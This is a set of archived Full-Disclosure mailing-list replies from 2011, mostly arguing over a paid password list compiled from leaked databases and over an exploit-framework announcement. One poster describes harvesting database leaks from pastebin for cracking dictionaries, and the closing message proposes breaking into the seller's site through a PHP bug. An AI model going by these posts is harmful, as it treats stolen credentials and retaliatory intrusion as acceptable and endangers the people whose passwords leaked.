In case you missed it, that's one of the other files he's hosting off that website. Part of his plan to sell this groundbreaking .txt file, or whatever. On Thu, Dec 1, 2011 at 8:11 PM, xD 0x41 sec...@gmail.com wrote: 22033538 whats this hash for nothin. hes a f00l. altho, i dont like you, atleast, you see a fool as i do. unfortunately, your not much better. On 2 December 2011 13:05, adam a...@papsy.net wrote: Also, not to beat a dead horse, but.. - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger Is also pretty ridiculous. Why? Because you're offering hashes.txt, passwords.txt and uniqpass_preview.txt to the world: C:\Users\adam\Desktopls -la uniqpass_preview.txt | gawk {print $5} 19855177 C:\Users\adam\Desktopls -la passwords.txt | gawk {print $5} 17496649 C:\Users\adam\Desktopls -la hashes.txt | gawk {print $5} 22033538 C:\Users\adam\Desktopecho 19855177 + 17496649 + 22033538 | bc 59385364 In total, 56MB and you're offering them for free and uncompressed. C:\Users\adam\Desktopzip -9 combined.zip passwords.txt uniqpass_preview.txt hashes.txt adding: passwords.txt (164 bytes security) (deflated 60%) adding: uniqpass_preview.txt (164 bytes security) (deflated 38%) adding: hashes.txt (164 bytes security) (deflated 46%) C:\Users\adam\Desktopls -la combined.zip | gawk {print $5} 31337317 Meanwhile, if you were compressing them: they'd be almost half the size. But you're not, you don't even seem concerned with doing so, and you're going to pretend that 8MB is really making that big of a difference? If so, why are you wasting 27MB by offering those 3 files uncompressed? That doesn't really make much sense to me. On Thu, Dec 1, 2011 at 7:52 PM, Benji m...@b3nji.com wrote: Which country is UNIQPASS registered as a tm? On Fri, Dec 2, 2011 at 1:47 AM, adam a...@papsy.net wrote: - reduce abuse The concerning part is that you're serious. Tell me, how does someone paying for a list of STOLEN passwords reduce abuse? This email, your obsession with LulzSec and the disclaimer on your site make it pretty clear where the information is coming from, so what kind of abuse potential does this have by someone not paying? And who are you to not only take credit, but also demand payment, for other peoples' efforts? I'm partly tempted to buy and post the list here just to spite you for being so idiotic. On Thu, Dec 1, 2011 at 7:16 PM, Addy Yeow ayeo...@gmail.com wrote: There are many password lists already available for free out in the wild but mostly lack the quality. The minimal fee for UNIQPASS is necessary to help: - keep ongoing effort to improve the quality of the list over time - ensure frequent updates, i.e. when new leaked databases appear (existing users of UNIQPASS get updated copy for free) - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger - reduce abuse On Fri, Dec 2, 2011 at 1:33 AM, Fabio Pietrosanti (naif) li...@infosecurity.ch wrote: On 12/1/11 6:14 PM, Addy Yeow wrote: I thought some of you may find this large password list useful, over 27 million entries. http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99) Anyone linking a warez version (Why pay $4.99?) ? -naif ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
Fix defaced website or flip burgers to help mom with the rent, that's tough dilemma for a script-kiddie. Speaking of helping mom: http://web.archive.org/web/20110129092551/http://crazycoders.com/ On Thu, Dec 1, 2011 at 3:47 PM, ghost gho...@gmail.com wrote: I saw your site got defaced today, mr your meant to be PRO. Maybe time for less posting and more edumacation ? On Thu, Dec 1, 2011 at 11:41 AM, xD 0x41 sec...@gmail.com wrote: dude, your meant to be PRO, ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Large password list
As usual Xd is trolling .. and I shouldn't answer but he pisses me off .. Gary B On 12/01/2011 09:10 PM, xD 0x41 wrote: This is what whitehats would probably class as a 'blackhat' , the sad thing is, i bet NO blackhats, really like this.. not serious ones. Its sad, your a pathetic person, resorting to online theft, to cover your bs demands, as pointed out, what 'costs', for keeping, stolen data... ? ONLY the cost, You are, to the community. your called a bad scourge, and bad example of a hacker. I wish you and your website and service, are overthrown, your a fool, and, you suck. i hope feds are pulling you apart. amigo. go fk yourself, rot. your NO hacker, your 'wanker' go whack d1ck sum more. Bad sad kid with some sqli...well, sadly, you should NEVER post criinal activities, to a list like this, are you stupid or, just fucking REALLY STUPID?? Idiot You are NO blackhat,and NO hacker. xd On 2 December 2011 12:52, Benji m...@b3nji.com wrote: Which country is UNIQPASS registered as a tm? On Fri, Dec 2, 2011 at 1:47 AM, adam a...@papsy.net wrote: - reduce abuse The concerning part is that you're serious. Tell me, how does someone paying for a list of STOLEN passwords reduce abuse? This email, your obsession with LulzSec and the disclaimer on your site make it pretty clear where the information is coming from, so what kind of abuse potential does this have by someone not paying? And who are you to not only take credit, but also demand payment, for other peoples' efforts? I'm partly tempted to buy and post the list here just to spite you for being so idiotic. On Thu, Dec 1, 2011 at 7:16 PM, Addy Yeow ayeo...@gmail.com wrote: There are many password lists already available for free out in the wild but mostly lack the quality. The minimal fee for UNIQPASS is necessary to help: - keep ongoing effort to improve the quality of the list over time - ensure frequent updates, i.e. when new leaked databases appear (existing users of UNIQPASS get updated copy for free) - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger - reduce abuse On Fri, Dec 2, 2011 at 1:33 AM, Fabio Pietrosanti (naif) li...@infosecurity.ch wrote: On 12/1/11 6:14 PM, Addy Yeow wrote: I thought some of you may find this large password list useful, over 27 million entries. http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99) Anyone linking a warez version (Why pay $4.99?) ? -naif ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
fail. On 2 December 2011 13:25, Antony widmal antony.wid...@gmail.com wrote: Fix defaced website or flip burgers to help mom with the rent, that's tough dilemma for a script-kiddie. Speaking of helping mom: http://web.archive.org/web/20110129092551/http://crazycoders.com/ On Thu, Dec 1, 2011 at 3:47 PM, ghost gho...@gmail.com wrote: I saw your site got defaced today, mr your meant to be PRO. Maybe time for less posting and more edumacation ? On Thu, Dec 1, 2011 at 11:41 AM, xD 0x41 sec...@gmail.com wrote: dude, your meant to be PRO, ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Large password list
On Fri, 02 Dec 2011 13:10:14 +1100, xD 0x41 said: Idiot You are NO blackhat,and NO hacker. xd You know things are pretty screwed up when I'm +1'ing an xD rant. :) pgp6MREtrth6e.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FreeBSD ftpd and ProFTPd on FreeBSD remote r00t exploit
If you want to respect the license of this code you cannot include the exploit in your software. And don't get me started about my patent on NOP sleds! /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Large password list
I am at a lack of words for this, why pay $4.99 when you can just do some simple googling? You can even search pastebin and get a mass collection of password lists from dbases. Add a dash of awk and maybe a pinch of sed and viola! If you are like me I always download and store the various dbase leaks because it makes an awesome dictionary. Some more simple magic and you have a cut down list of all the common passwords used. I'd rather spend the money on some coffee to drink while I do the above examples. On Thu, Dec 1, 2011 at 10:14 AM, Addy Yeow ayeo...@gmail.com wrote: I thought some of you may find this large password list useful, over 27 million entries. http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Large password list
Or simply, use openwal.com who atleast do something and have an oyutstanding os... they do not charge on that basis, and also the socalled hash, if you look in the 3 offered fiiles, theyre all same length of digits, i am not even sure what hes offering, because, i assume that is a decrypted list...not encrypted, yet he has *_hash.txt there,wich is same length as other txt files, same ne line, 5 digit kinda list... not even a 1234 :s lol... its very ambiguous, and id beware that it is just not a flare, to get ppl to visit, to infect, other ways... be careful guys... l,theyre cdlists, and a million others linked to them :s its kinda stupid and, hopefully it dies... like, shutdown. On 2 December 2011 14:59, Sanguinarious Rose sanguiner...@occultusterra.com wrote: I am at a lack of words for this, why pay $4.99 when you can just do some simple googling? You can even search pastebin and get a mass collection of password lists from dbases. Add a dash of awk and maybe a pinch of sed and viola! If you are like me I always download and store the various dbase leaks because it makes an awesome dictionary. Some more simple magic and you have a cut down list of all the common passwords used. I'd rather spend the money on some coffee to drink while I do the above examples. On Thu, Dec 1, 2011 at 10:14 AM, Addy Yeow ayeo...@gmail.com wrote: I thought some of you may find this large password list useful, over 27 million entries. http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
Why did you rewrite metasploit? On Tue, Nov 29, 2011 at 9:09 PM, nore...@exploitpack.com wrote: Exploit Pack is an open source security tool that will help you test the security of your computer or servers. It combines the benefits of a Java GUI, Python as engine and the latest exploits on the wild. It has an IDE to make the task of developing new exploits easier, Instant Search and XML-based modules. The latest release, version 1.1 is available for download right away! Take a look of the new features on this quick video: http://www.youtube.com/watch?v=cMa2OrB7b5A Download it directly from the main site: http://www.youtube.com/watch?v=DPX7JdvTRmg We are looking for investors or donations to maintain this project alive! Thank you! The only one who has daily updates Exploit Pack ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
Thats not the main one :P Checkout INSECTPro tool ;) but, thats metasploit v2 nd v3 i believe...and alot nicer than this,...same author... i have a copy, but he wont let me know, if i can use my copy, to pull updates from git ;'( I assume that means, the pirated copy i have, must work fine, aslong as it is just that...pirated...and checkout his explitpack.com/downloads/ very interesting files there yesterday... hehe... pentesting the testers... i guess we all get that... but, insectpro is available waresdim sure of it.. alot bigger than his exploitpack tho.. i would not mind if exploitpack stays in python, it might inspire many coders who do code but, only py, to code more...so, i see some of his stuff as cool but then, he made insectpro, a drect rip off of msf ,wich is the bad side... On 2 December 2011 15:48, Sanguinarious Rose sanguiner...@occultusterra.com wrote: Why did you rewrite metasploit? On Tue, Nov 29, 2011 at 9:09 PM, nore...@exploitpack.com wrote: Exploit Pack is an open source security tool that will help you test the security of your computer or servers. It combines the benefits of a Java GUI, Python as engine and the latest exploits on the wild. It has an IDE to make the task of developing new exploits easier, Instant Search and XML-based modules. The latest release, version 1.1 is available for download right away! Take a look of the new features on this quick video: http://www.youtube.com/watch?v=cMa2OrB7b5A Download it directly from the main site: http://www.youtube.com/watch?v=DPX7JdvTRmg We are looking for investors or donations to maintain this project alive! Thank you! The only one who has daily updates Exploit Pack ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
The only one who has daily updates Thats total crap... look like 3 posts away, he had to apologise for playing with his new MMORPG game , instead of doing as he had said, wich was, porting the latest freebsd PoC/exploit code, to his py, he made even, exe installer, wich led nowhere... then, he apprently, has now fixed it.. but, he is by no way pro, and, those updates, id watch, because any exe coming from some place called exploitpack.com, is just..well... youd wanna check it yes. On 2 December 2011 15:48, Sanguinarious Rose sanguiner...@occultusterra.com wrote: Why did you rewrite metasploit? On Tue, Nov 29, 2011 at 9:09 PM, nore...@exploitpack.com wrote: Exploit Pack is an open source security tool that will help you test the security of your computer or servers. It combines the benefits of a Java GUI, Python as engine and the latest exploits on the wild. It has an IDE to make the task of developing new exploits easier, Instant Search and XML-based modules. The latest release, version 1.1 is available for download right away! Take a look of the new features on this quick video: http://www.youtube.com/watch?v=cMa2OrB7b5A Download it directly from the main site: http://www.youtube.com/watch?v=DPX7JdvTRmg We are looking for investors or donations to maintain this project alive! Thank you! The only one who has daily updates Exploit Pack ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Large password list
http://dazzlepod.com/site_media/txt/passwords.txt hes put alo of passes here, and makes direct compares to JTR on the website.. this seems to be the Point of sale also...so this domain would shape the outcome.. On 2 December 2011 14:40, Richard Golodner rgolod...@infratection.com wrote: On Fri, 2011-12-02 at 14:14 +1100, xD 0x41 wrote: needs to b shudown...if it can be... cheers, always happy to speak to you :) Always happy to speak with you as well my friend. We can shut the fucker down. Can you give me his domain name. I think that a shitty php bug would get a lot of L44t hackers as they see that shit and just download it without thinking about it. Get me a little background info and I can get started. Richard ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/